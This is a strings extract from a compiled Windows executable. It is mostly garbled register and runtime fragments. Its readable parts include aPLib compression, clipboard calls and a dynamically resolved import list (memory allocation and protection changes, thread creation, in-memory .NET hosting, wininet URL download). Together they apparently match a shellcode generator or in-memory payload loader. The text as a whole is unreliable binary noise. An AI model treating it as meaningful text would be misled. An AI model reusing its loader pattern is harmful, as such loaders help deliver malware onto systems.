!This program cannot be run in DOS mode.
RichTR
.text
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
\$0H
t$8H
\$0H
t$8H
\$0H
t$8H
VAVAWH
D$pH
|$@H
l$HL
d$8L
L$(L
l$0H
T$ A;
D$pL
L$(+
l$pH
D$pL
L$(D
l$pH
l$0H
l$HL
d$8H
|$@H
D$xD
PA_A^^
|$ ATAUAVH
\$@H
l$HH
t$PH
|$XA
 A^A]A\
|$ ATAUAVH
\$@H
l$HH
t$PH
|$XA
 A^A]A\
L$ L
SUVH
t$xI
|$pL
D$hA;
D$XH
D$PH
D;l$`u
L$\D
T$8A+
L$<A
L$`D
T$XI
T$<E
T$\D
L$H3
D$\;D$<|'A+
u"A;
;L$H
\$LE
T$@I
D$@H
T$8E
T$@H
D$@H
T$8E
T$@A+
L$ D
\$@A;
T$DE
T$0E
T$LE
D$L;
L$<;
T$<E
D$T;
T$<E
D$<;
D$<E
t$<L
D;d$P
T$@A+
L$ E
\$@A;
T$DE
T$0E
t$0E
D;l$hs 
T$dL
t$xL
|$pH
D$0H
D$(L
L$ E
T$8H
L$ D
D$4@
D$4 
D$PH
D$ E3
D$43
D$@H
D$xH
D$ D
T$0H
D$HH
D$HH
D$@H
D$@H
D$@H
D$ H
D$0H
D$0H
D$0H
D$0H
D$0H
D$0H
D$0H
D$0H
D$0H
Hc@<H
L$0H
D$ H
D$(H
D$ H
D$ H
D$@H
Hc@<H
L$@H
H9D$Hrc
H9D$Hs:
T$HH+
D$ H
D$`H
T$0H
D$ A
L$`H3
D$`H
D$hH
D$pH
D$xH
D$PH
L$PH
L$8H
L$ L
D$XH
L$XD
D$@H
D$0H
D$HH
D$PH
D$DH
D$8H
D$8H
D$XH
D$8H
D$8H
D$`H
D$`H
D$ H
D$ @
T$XH
D$03
D$0H
D$0H
D$(H
D$ HcD$ H;
s+HcD$ 
HcL$ H
HcD$ H
D$$H
D$0H
D$0H
D$0H
D$0H
D$PH
D$PH
D$PH
L$0H
D$PH
L$0H
D$PH
L$0H
D$PH
D$PH
L$0H
D$PH
L$0H
D$0H
D$0H
D$PH
L$0H
D$$H
L$0H
D$PH
L$0H
D$ H
D$0P
D$0HcD$0
D$ H
L$ H
D$ H
D$ H
D$ H
D$ H
D$ H
L$ H
D$ H
T$hH
D$ H
T$HH
D$ H
D$ H
D$(HcD$(Hk
tcHcD$(Hk
T$ H
D$8HcD$(Hk
T$ H
H3D$8HcL$(H
T$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
L$ H
L$ H
D$ H
D$ H
L$ H
T$XH
D$ H
L$ H
L$ H
D$ H
D$@H
D$@H
T$xH
D$,H
D$(H
t(HcD$PL
L$(L
D$ H
D$PH
L$PD
L$PH
HcD$$H
D$PH
D$PH
D$PH
D$PH
D$PH
D$PH
D$PH
D$PH
D$PH
D$0H
HcD$(H
D$PHc
L$0L
D$PH
D$0H
D$PH
D$0H
D$PH
D$0H
D$PH
D$0H
D$PH
D$0H
D$PH
D$0H
D$PH
D$ H
D$ H
D$@Hc
D$@Hc
D$@Hc
D$@Hc
L$@H
D$@H
D$@H
D$(H
D$(H
D$(H
D$ A
T$ H
D$(H
D$(H
D$@Hc
D$@H
D$@Hc
L$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(A
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
T$ H
D$(H
D$(A
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(H
D$(A
D$(H
D$(3
D$@H
D$@H
D$@H
D$ H
D$0H
D$8H
D$8H
D$@H
D$PH
T$pH
D$(H
D$0H
D$ HcD$ 
T$HH
HcD$ 
T$HH
;D$@} 
L$HH
NHcD$ 
T$HH
HcL$ 
D$HI
9D$ 
HcD$ 
HcD$ 
HcD$(H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
D$ H
$HcD$ A
wlHcD$,H
D$@H
D$@H
D$HH
T$HH
D$PH
D$PH
D$XH
D$XH
T$`H
T$0H
D$hH
T$hH
D$pH
D$pH
D$xH
T$xH
L$ L
L$XH
L$ L
L$PL
D$HH
T$@H
L$ H
D$HH
L$(E3
T$@H
D$ H
D$ H
D$PH
D$pH
D$8H
D$xH
D$$H
|$$@
+D$ 
L$ H
T$0H
L$0H3
D$0A
L$ H
T$0H
L$0H3
D$0H
L$PH3
D$ H
D$HH
L$ H3
L$ L
D$PH
D$0H
D$xH
L$ H
T$@H
D$(9D$ s&
L$ H
D$(H
L$0H
L$PH3
D$8H
D$0H
L$ E3
T$X3
D$0H
L$ L
T$XH
D$ L
L$`D
D$(H
D$ D
T$0H
D$@H
D$(H
D$H9D$ sj3
D$ H
D$@H
D$(H
D$H9D$ sl3
D$ H
D$@H
D$(H
D$H9D$ s>
D$ H
9D$ s
D$@H
D$(D
D$HH
D$H9D$ s>
D$ H
9D$ s
D$@H
D$H9D$ s#
D$ H
L$ L
D$0H
D$@H
D$89
D$@H
L$ H
D$PH
D$(L
L$(E3
T$HH
D$ H
D$ H
D$0H
D$(H
D$ H
D$0H
D$8H
D$0H
D$0H
D$8H
D$ H
D$ H
D$(H
T$8H
D$0H
\$@H
t$HH
D$8H
D$8H
D$@H
D$(H
D$(H
T$0H
\$ WH
T$PH
L$XH
T$PL
L$0L
L$`H
L$(3
\$hH
@SVWH
T$`H
L$hH
T$`L
L$0L
L$pH
L$(3
@_^[
t!eH
uxHc
uTL+
\$ UH
M H1E
 H3E H3E
\$HH
L$0L
L$(H
L$ 3
L$PH
D$PH
D$@H
D$H3
u0HcH<H
8csm
\$0H
\$0H
ntelA
GenuD
ineI
t(=`
t!=p
 w$H
T$ H
D$ $
\$(3
t$0H
 v.H+
t=L;
ffff
WATAUAVAWH
_8M+
l$0H
|$8;3
L$0I
x}~t
D$(I
 tDE3
\$@I
A_A^A]A\_
t#eH
9csm
A - 
t5HcP
WATAUAVAWH
Wu*D
\$PH
l$XH
t$`H
 A_A^A]A\_
\$0H
\$0H
t$8H
L$0H
T$8D
D$@H
T$8H
L$0H
T$8D
D$@H
L$0H
T$8H
T$8H
L$0H
T$8L
D$@D
L$HE
T$8A
x AVH
N0E3
\$0H
l$8H
t$@H
|$HH
\$0H
\$8H
\$HH
t$PH
L$@M
D$ H
L$ WH
\$0H
t$8H
\$0H
t$ WATAUAVAWH
\$PH
l$`H
t$hH
 A_A^A]A\_
;D$Xs;
L$ WH
\$0H
v	H;
\$0H
l$8H
t$@H
D+AHH
E+BHH
x AVH
\$0H
l$8H
t$@H
|$HH
\$0H
t$8H
UWAVH
L$ @
D$(H
L$@L
t$PL
t$hL
t$pD
t$xfD
D$@H
D$HL
L$XL
T$`D
D8t$8t
A^_]
VWAVH
D$@H;G
\$H@
l$PH
 A^_^
\$8H
l$@H
{A*t
{A*t
CA< t(<#t
<0uG
AA<Fu
<Nu'
<htl<jt\<lt4<tt$<wt
<<6u
!,X< w
t$ WAVAWH
<Ct-<D
<StW@:
tg<Zt
<g~{<itd<ntY<ot7<pt
<utT@:
D$P3
D$P-
D$P+
D$P I
D<P0@:
t<QH
k4+kP+
D$ H
T$PI
\$XH
l$`H
t$hH
0A_A^_
AA,c
AA,A$
yAgt
yAGu
D$`H
D$@H
L$(H
L$`H
T$ H
CA,G
K0@H
,I<%w
CAsH
\$hH
CA,c
WAVAWH
tZH;
HcS8
\$@H
l$HH
t$PH
 A_A^_
HcG(H
\$0H
t$8H
CA,c
KHIc
KHIc
L$0A
D$0E
T$4H
;{Pu
L$@H3
\$hH
t$pH
x ATAVAWH
|$`I
8*u;I
\$@H
l$HH
t$PH
|$XH
 A_A^A\
L$ WH
\$0H
u3HcH<H
\$`H
t(eH
L$8H
L$8H
x AUAVAWH
D$(H
<	w	@
	w	@
t2A;
s-A;
@88t
t@A;
\$`H
l$hH
t$pH
|$xH
@A_A^A]
WAVAWH
D$(H
<	w	@
	w	@
t2A;
@88t
\$`H
l$hH
t$pH
@A_A^_
\$0H
l$8H
t$@H
T$ H
L$ A
L$ H
T$(H
T$ 3
L$ H
T$(H
T$ 3
t$H+
x AVH
u"8Z(t
uUH9Z
uF8Z(t
\$(L
vC8_(t
L$(L
D$ A
\$@H
t$PH
|$XH
UWATAVAWH
t$0A
\$pI
A_A^A\_]
U8fD
t$(A
UVWAVAWH
L$ E3
A_A^_^]
D$(D
f9)t
t$@f
:u(f9Q
utfD9A
ugfD9A
t`f9Q
tNfA;
t&fA;
VWAVH
L$ H
8"uQ
fD94Gu
A^_^
\$0H
t$@H
l$8H
\$0H
t$8H
\$@H
t$HH
|$PH
\$ ;
x AVH
\$0H
l$8H
t$@H
|$HH
ATAVAWH
t$(I;
\$PH
t$XH
|$`H
0A_A^A\
\$0H
t$8H
|$@H
s*Hc
d$ H
\$@H
\$0H
l$8H
t$@H
x ATAVAWH
|$`M
< t=<	t9
\$@H
l$HH
t$PH
|$XH
 A_A^A\
UVWAVAWH
@8>u
D$ E3
H9:t
H98u
0A_A^_^]
\$0H
WAVAWH
A84.u
<=t5
\$PH
t$`H
l$XH
0A_A^_
t$ E3
\$0H
\$PH
t$XH
t$(H
u&H9
u&H9
\$0H
l$8H
t$@H
\$0H
L$ WH
\$ H
H93t
\$@H
t$HH
D$8I
D$@I
L$ WH
\$0H
L$ WH
\$0H
t$ WAVAWH
H33M3
\$HH
l$PH
t$XH
 A_A^_
WAVAWH
\$@H
l$HH
t$PH
 A_A^_
D$PI
D$(L
\$PH
D$(L
\$PH
t$XH
L$ WH
\$0H
T$XL
L$PH
T$XH
D$ L
D$ H
\$0H
D$ @
T$`H
t#HcL$`H
\$`H
D$0D
L$(D
D$ D
t!Hc
s WAVAWH
D$PA#
\$PH
T$PA
tEA;
tzE3
D$P=
T$PD+
\$XH
l$`H
t$hH
0A_A^_
\$ E3
VWAVH
u~9t$Xt
l$`H
\$PH
0A^_^
Hux3
l$0H
\$8H
l$@H
p UH
D$0I
L$`E
L$ D
UATAUAVAWH
t$0D
L$ H
L$ H
u3Hc
Hu A
L$ H
A_A^A]A\]
UWAVH
L$pA
D$pH
D$HH
T$@I
L$XH
T$@L
L$0M
L$`H
L$(H
L$ 3
t$pH
A^_]
T$`D
T$ L
\$@H
l$HH
t$PH
L$`I
D$`H
\$0H
t7SH
WATAUAVAWH
\$PH
l$XH
t$`H
 A_A^A]A\_
D$@L
L$8H
L$(H
L$ H
\$`H
l$hH
t$pH
\$0H
\$0H
t$8H
D$@L
L$8H
L$(H
L$ H
\$`H
l$hH
t$pH
\$0H
\$$;
tmHc
D$ H
D$ H
\$@H
L$ WH
\$0H
L$ VWAVH
\$8I;
D$ H
D$ L
D$@H
D$HH
L$PH
T$XH
D$ H
D$(H
D$0L
L$(L
D$@H
T$0H
`A^_^
EE(H
\$0H
t$8H
x AVH
fD9t$b
D$hH
x AVH
\$0H
l$8H
t$@H
|$HH
\$0H
t$@H
l$8H
t$8H
\$0H
p WH
D$8:
D$0H
L$pD
l$hH
\$`H
t$xH
UVWATAUAVAWH
L$XE3
L$@D
D8T8>t
D$DH
\$8H
\$0E
L$HD
\$ H
9|$H
L$Hf
D$@E
T$ H
~-H+
A_A^A]A\_^]
VWAV
\$@H;
D$@+
L$0D
T$@I
A^_^
VWAV
\$@H;
D$@H+
L$0H
A^_^
VWATAVAW
D$PI;
L$PH
D$PH+
D$(U
L$ D
L$@D
t$@;
A_A^A\_^
WATAUAVAWH
\$XH
t$`H
 A_A^A]A\_
\$ UVWATAUAVAWH
8}O@
H!D$ H
`A_A^A]A\_^]
B8 t
T$0A
\$8H
t$@H
D$83
T$0H
D$0H9D$8
\$0H
t$8H
\$0H
t4SH
@8*u
@8l$Ht
L$8D
~/A;
D$(H
r>@8o
D$(A
D$8H
\$`H
l$hH
t$pH
L$ UVWH
`_^]
D$8L
t$(3
wu	H
wu	I
fA9	t	I
fA9	
L$ WH
\$0H
L$ WH
\$0H
L$ WH
\$0H
L$ WH
\$0H
\$0H
\$0H
t$8H
\$0H
t$8H
WATAUAVAWH
l$@L
D$8H
|$(H
D$XH
E8/L
d|/H
gfffffffH
D8l$ht
A_A^A]A\_
|$@-D
D$8H
\$`H
l$hH
t$pH
x AWH
\$`H
l$hH
t$pH
|$xH
D$8H
80tWD
gfffA
x AVH
T$xH
D$(H
\$P3
l$XH
t$`H
|$hH
t$DL
L$@D
|$@-H
}=D;
L$@D
D$(H
D$8H
\$`H
l$hH
|$pH
D$@H
T$8H
D$(L
L$ M
D$PH
D$PH
D$T3
|$P-H
L$PH
L$PH
D$(D
D$@H
T$8H
D$(L
L$ M
D$@H
T$8H
D$(L
L$ M
\$`I
\$0eH
H 9Y
T$0H
L$0H
D$0H
D$(H
L$ A
f9|$ tyf
|$":uq
f9;t
)H;G
8_(t
\$0H
x AVH
xH;w
8_(t
\$0H
t$@H
|$HH
8Z(t
u0H9Z
u"8Z(t
\$8A
\$0L
\$(3
8_(t
\$8L
\$03
\$PH
t$`H
x AVH
\$0H
l$8H
t$@H
|$HH
tif9
|$hH
\$`H
fD9	t(L
WAVAWH
T$(H
fD93s
T$(H
fD96s
T$(H
\$`H
l$hH
t$pH
@A_A^_
*u/3
@USVWATAUAVAWH
Lcep
LcmhA
xA_A^A]A\_^[]
t$ E3
x AVH
u"8Z(t
uTH9Z
uF8Z(t
\$8A
\$0L
\$(3
vB8_(t
\$8L
\$03
L$(A
\$PH
t$`H
|$hH
UVWATAUAVAWH
EP*?H
}PI+
UXM;
C8<(u
EXM;
`A_A^A]A\_^]
|$ E3
WATAUAVAWH
@84)u
\$`H
l$hH
t$pH
0A_A^A]A\_
H97u+A
mL+7H
t$ E3
\$ UVWATAUAVAWH
,/<-w
L$0H
D$8A
@8|$Ht
@8|$Ht
@8|$Ht
|$(H
|$ H
M+4$I
|$pH
L$PH
|$xH
D$XD9x
@8|$ht
@8|$ht
@8|$ht
T$pH
t <.u
t)I+
A_A^A]A\_^]
L$ H
\$@3
D$HH
D$XH
D$(A
8D$8t
T$@H
D$`H
L$ WH
\$0H
\$0H
l$8H
t$@H
D$VH
D$p 
D$8H
t$0H
D$8H
t$0H
L$ L
UVWH
\$`H
@_^]
\$0H;
L$0H;
\$8H
t$@H
UVWATAUAVAWH
D$8H
L$&8\$&t,8Y
t>8Z
L$8H3
@A_A^A]A\_^]
D$(H
\$PH
t$XH
L$HE
D$@H
L$HA
D$@[H
x AVH
fD90t
fD94Fu
fD96u
t$8H+
t$0H
t$(3
t$ 3
t$8D
t$0L
l$(3
\$PH
t$`H
l$XH
|$hH
UVWATAUAVAWH
l$pu
t?H95
H95M
H95)
xWI96tRI
9t$x
C847u
\$pH
0A_A^A]A\_^]
t$ E3
\$@H
t$HH
|$PH
T$0H
L$0H
K H;
K(H;
K0H;
K8H;
K@H;
KHH;
KhH;
KpH;
KxH;
tfSH
KXH;
K`H;
\$0H
t$8H
\$0H
l$8H
@UATAUAVAWH
l$0H
\$0H
t$(M
M H3
e0A_A^A]A\]
\$0H
l$8H
t$@H
t0SH
\$0H
\$0H
\$0H
l$8H
t$@H
t1H;
\$0H
t$8H
L$ WH
\$0H
D$8I
D$@I
\$ VWATAUAVH
D!l$xA
@A^A]A\_^
?H37H
D$0I
D$(H;
x ATAVAWH
yIE3
|$XH
l$HH
t$PH
 A_A^A\
\$ UVWATAUAVAWH
s"E8
L$xM
T$pA
L$pA:
DD8T$pu
D8T$pt
0A_A^A]A\_^]
@SUVWATAUAVAWH
@u	A
8A_A^A]A\_^][
x ATAVAWH
8Ht;I
D$p+
D$(D
|$ 3
\$PH
l$XH
t$`H
|$hH
0A_A^A\
UVWATAUAVAWH
D;%r
L$HM
D$@L
t=A;
D$@H
|$PA
D$@H
8}mH
L$8H
L$8L
t$HH
L$8L
t$ I
T$@L
@8t$HtsL
T$PI
fA90u
T$PA
`A_A^A]A\_^]
WATAUAVAWH
\$XH
t$`H
 A_A^A]A\_
D$HH
D$HH
\$0H
t$8H
WAVAWH
\$@H
l$HH
t$PH
 A_A^_
L$ WH
\$0H
T$XL
L$PH
T$XH
D$ L
D$ H
s&Hc
WATAUAVAWH
D8/u
L$PH
\$XH
l$`H
 A_A^A]A\_
D8/u
\$0H
D$(H
\$0H
SUVWATAVAWH
D$DH
l$@L
\$ E
\$8H
D$0E;
L$0E
D$(I
L$ A
D$(3
A_A^A\_^][
@USVWATAUAVAWH
L$8I
L$XL
L$hM
D$XE3
D$HH
T$HL
d$8E
tOE;
d$8E
tOE;
d$8t
D$8D
l$DA
T$HE
u!E;
st]A
T$HA
d$0D
D$8D
teE3
|$hE3
D$DD
T$HE
u!E;
st]A
L$pH
T$HA
D+d$8H
|$hE3
#D8d$`t
A_A^A]A\_^[]
d$ E3
\$0H
t$8H
@USVWAVH
`A^_^[]
D$":
L$ H
L$ f
L$(H3
T$`A
D$8H
D$ L
D$`A
p WATAUAVAWH
L$H3
T$@A
|$0D
f9=Oz
\$HD
\$@D
T$8D
|$HD
\$8A
|$(A
D$ A
|$@D
\$8A
|$0A
|$(A
}3A;
\$`I
A_A^A]A\_
|2kM
|$ E3
VWAVH
kT$p
T$xD;D$x
\$XH
l$`H
0A^_^
L$PD
iL$P
UVWAUAVH
;+t	
;:uYH
U8@:
<:u#H
\$`H
0A^A]_^]
@USVWH
f95.t
U(t	Ak
E(f95`t
D$8H
D$(?
9u0u	H
D$8L
D$(?
9u0u
H_^[]
t$ E3
D$ L
D$0H
@87t
ATAUAVH
L$ fff
L$ H
L$ H
s I+
L$ |+L;
L$ I;
L$ L;
A^A]A\
\$0A
D$@3
L$@H3
\$@H
t$HH
\$@H
t$HH
t6ff
\$@H
t$HH
\$@I
t$HH
L$0H
\$PH
@UATAUAVAWH
l$PH
Hc]`M
t$PH
d$(D
D$(I
tSH;
\$PH
|$(I
H!T$0D
ue!T$(H!T$ 
A_A^A]A\]
D$(H
D$@L
D$8H
D$0H
\$pI
D$HH
L$HL
D$8L
|$0A
UAVAWH
D8}?t	H
A_A^]
\$0H
UVWAVAWH
D$0E3
fE9S
L$0H3
\$xH
@A_A^_^]
\$0D
\$(H
\$PH
t$`H
D$09
D$49C
D$8H
@CH;
ot$ H
ffffff
ot$ H
ot$ H
ot$ H
ot$ H
ot$ H
fffffff
ot$ H
t'H;
ot$ H
D$(H
\$`H
l$hH
t$pH
\$0H
t$8H
p AWH
\$@H
t$HH
|$PL
t$XH
\$ E3
@USVWATAUAVAWH
l$PH
E(Hc
r	:H
D8 u
t D8`
r	:H
D8 u
d$(D
|$PH
d$(D
\$PH
|$(D
|$(H
M(H3
e8A_A^A]A\_^[]
D$8L
D$0H
\$pH
t$xH
|$ D
|$ fA
D$@H
t$83
USVWAVH
D$@H
D$PH
D$HH
D$(H
T$@H
L$`H
D$@M
D$HH
A^_^[]
T$ H
D$ D
D$8A
D$("
t$xL
(t$PH
D$xH
D$(H
D$pH
t>H=
t&H=
!P H
!P`H
A A#
B`A#
\$8H
t$@H
|$HH
t$ WH
\$@H
t$HH
LcA<E3
t"H+
\$0H
u HcA<H
T$8H
t"HcM`H
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
aPLib v1.1.1  -  the smaller the better :)
Copyright (c) 1998-2014 Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
 new
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`RTTI
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
operator co_await
operator<=>
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
( 8PX
700WP
`h````
xpxxxx
(null)
CorExitProcess
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
UTF-8
UTF-16LEUNICODE
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
e+000
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
d8L2
[aOni*{
@2&@
"RP(
eLK(w
FEMh
h0'D
owM&
~ $s%r
@b;zO]
$qE}
;*xh
["93
iu+-,
\lo}
obwQ4
&Sgw
R	E]
?nz(
=87M
v2!L.2
	cQr
X/4B
k=yI
^<V7w
W&|.
1#INF
1#QNAN
1#SNAN
1#IND
UUUUUU
UUUUUU
TUUUU
#Ib?
=imb;D
=W>6
:		r
>[^j
>Kb|
+>De
1<.	/>:
11Y@
/>58d%
MJ$>
>cQ6
!>6'Y
>jtm}S
>77:
)>6{1n
r	Vr.>T
+f)>0'
Lj[;>
3>fvw
;H9>&X
*StO9>T
.>Tu
.(!>
n03>Pu
/>	V
S9>H
x.&>
K~Je#>!
-/!>
(>aI
=cQ6
+M<7>
*>f[
o ->
l(>>
c(>\,
ET5>
;>9l
mG4>
bp(=>?g
36,>
37>k
~X3>
6>J`
?>!T
BC?>6t9^	c:>
8'>0
'._M
=4<,
BF>^G
K&>.yC
 'L>[
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
dL?>
uzKs@>
3>N;kU
	kE>fvw
eF>t
L>ev
A>pP&
V6E>`"(5
,=>B
">}t
0iN>/
+h->|
@>%>b
?qBJ
l@6 
?-hk
OZQ%
-)4d
?:kP<
?UUUUUU
?f`Y4
?QY^&
?U)#
?ysB
?$G4
?30]
?7zQ6$
log10
.text
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.idata$2
.idata$3
.idata$4
.idata$6
.data
.bss
.pdata
_RDATA
.rsrc$01
.rsrc$02
CryptAcquireContextA
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
OpenClipboard
CloseClipboard
SetClipboardData
EmptyClipboard
USER32.dll
CloseHandle
MapViewOfFile
UnmapViewOfFile
GetModuleHandleA
GetProcAddress
CreateFileMappingA
GlobalAlloc
GlobalLock
GlobalFree
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
KERNEL32.dll
RtlUnwindEx
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RaiseException
ExitProcess
GetModuleHandleExW
CreateFileW
GetDriveTypeW
GetFileInformationByHandle
GetFileType
PeekNamedPipe
SystemTimeToTzSpecificLocalTime
FileTimeToSystemTime
SetStdHandle
GetStdHandle
WriteFile
GetModuleFileNameW
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapFree
CompareStringW
LCMapStringW
GetConsoleCP
GetConsoleMode
GetFileSizeEx
SetFilePointerEx
GetCurrentDirectoryW
GetFullPathNameW
MultiByteToWideChar
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetStringTypeW
GetProcessHeap
SetEndOfFile
ReadFile
ReadConsoleW
FlushFileBuffers
GetTimeZoneInformation
HeapSize
HeapReAlloc
WriteConsoleW
RtlUnwind
ntdll.dll
RtlEqualUnicodeString
ntdll.dll
RtlEqualString
ntdll.dll
RtlUnicodeStringToAnsiString
ntdll.dll
RtlInitUnicodeString
ntdll.dll
RtlExitUserThread
ntdll.dll
RtlExitUserProcess
ntdll.dll
RtlCreateUnicodeString
ntdll.dll
RtlGetCompressionWorkSpaceSize
ntdll.dll
RtlDecompressBufferEx
ntdll.dll
NtContinue
_^][
Vj P
Pj@WU
Pj@WU
_]^[Y
Pj@WU
Pj@WU
_]^[Y
SVWj<^3
D$(VWP
D$(Ph
L$|QP
UWSWWW
WWWWU
|$ Q
3D$$
_^][
)dll
t$h+
D$(P
L$hQP
D$ P
D$(PR
D$ P
D$ P
_^][
_^][
D$8j
D$HP
D$ Pf
t$$P
D$(P
uAVS
D$(PVS
D$(PVS
D$(PS
|$D3
D$,Pj
D$(Pj
D$(+D$,
D$4P
T$dR3
t$H@f
D$`Xf
D$TP
T$tRU
t$DVP
t$$V
@_^][
P<f;L
Vj@P
wTUV
,f;G
D$,P
f;D$
D$0PWS
L$0QPS
D$<PS
QQQUQQ
S@^_][
D$$PS
D$8PS
L$4RQ
VVVVVUP
S@^][
91tn@
@QUP
_^][
D$(P
D$(P
D$(P
D$$PV
;t)=
Dt$(@E
D$,P
\$ 3
l$(VW3
D$,3
D$$j
D$$_
t$ 3
l$(3
_^][
D$ U3
l$4+
_^][
YPt}
H!|$(L
!|$ L
L$0H
\$PH
\$0H
l$8H
t$@H
T$ H
L$xL
UVWAVAWH
D$PL
L$XA
D$PL
\$`H
 A_A^_^]
UVWAVAWH
D$PL
L$XA
D$PL
\$`H
 A_A^_^]
@USVWATAUAVAWH
L$@3
\$@H
D$XH
\$ A
D$dH
\$8E3
\$0H
\$8H
t$0L
\$(E3
d$ 3
A_A^A]A\_^[]
UVWATAUAVAWH
Lcz<M
D$0L
D$(A
D$ H
H3D$ H;
A_A^A]A\_^]
D$(H
.t	A
T$0H
T$8L
L$0I
\$0H
L$pI
D$8H
D$0H
D$(H
D$xH
D$ A
T$ H
t'Ic
T$ A
VWATAVAWH
|$(L
D$ E
T$0H
x3D9
D$ L
|$(L
D$ E
A_A^A\_^
\$ UVWATAUAVAWH
A_A^A]A\_^]
L$@D
|$0f
D$(D
D$ D
D$@H
D$@H
T$@H
UVWATAUAVAWH
l$PH
T$PH
L$PL
D$HA
L$PL
D$DA
D$D+D$HA
|$(A
T$@H
L$`3
D$hD9l$@
L$hH
;L$@r
L$hH
D$`D
|$xL
D$xH
|$(A
D$ E
D$XH
|$(L
D$ E
|$(E
D$ 3
T$@H
;L$@r
|$(H
T$ I
|$XI
A_A^A]A\_^]
SUVWATAUAVAWH
Ic}<E3
Lc@<E
fD9O
fD;g
L+w0E9!tf
E9"u
V8E3
D$ L
L$@H
E8 t*H
D$ 3
T$@H
d$(E3
d$ 3
A_A^A]A\_^][
t$ UWAVH
L$(D
D$ 3
D$PH
D$PH
D$XH
D$`H
D$hH
D$pH
D$ H
D$ D
!\$8I
!\$0H
A^_]
UVWATAUAVAWH
LcH<L
L$pI
A_A^A]A\_^]
T$pH
L$ I
L$ I
T$0H
\$0I
l$8H
t$@H
WAVAWH
\$ H
L$ H3
D$,A
\$PH
t$`H
l$XH
0A_A^_
L$(D
D$,H
D$(H
\$ H
|$(L
t$0H
p UH
tNE3
t$X+
\$PH
|$`L
t$hH
kernel32.dll
LoadLibraryA
kernel32.dll
GetProcAddress
kernel32.dll
GetModuleHandleA
Sleep
kernel32.dll
VirtualAlloc
kernel32.dll
VirtualFree
kernel32.dll
VirtualQuery
kernel32.dll
VirtualProtect
kernel32.dll
kernel32.dll
MultiByteToWideChar
kernel32.dll
GetUserDefaultLCID
kernel32.dll
WaitForSingleObject
kernel32.dll
CreateThread
kernel32.dll
GetThreadContext
kernel32.dll
GetCurrentThread
shell32.dll
CommandLineToArgvW
oleaut32.dll
SafeArrayCreate
oleaut32.dll
SafeArrayCreateVector
oleaut32.dll
SafeArrayPutElement
oleaut32.dll
SafeArrayDestroy
oleaut32.dll
SafeArrayGetLBound
oleaut32.dll
SafeArrayGetUBound
oleaut32.dll
SysAllocString
oleaut32.dll
SysFreeString
oleaut32.dll
LoadTypeLib
wininet.dll
InternetCrackUrlA
wininet.dll
InternetOpenA
wininet.dll
InternetConnectA
wininet.dll
InternetSetOptionA
wininet.dll
InternetReadFile
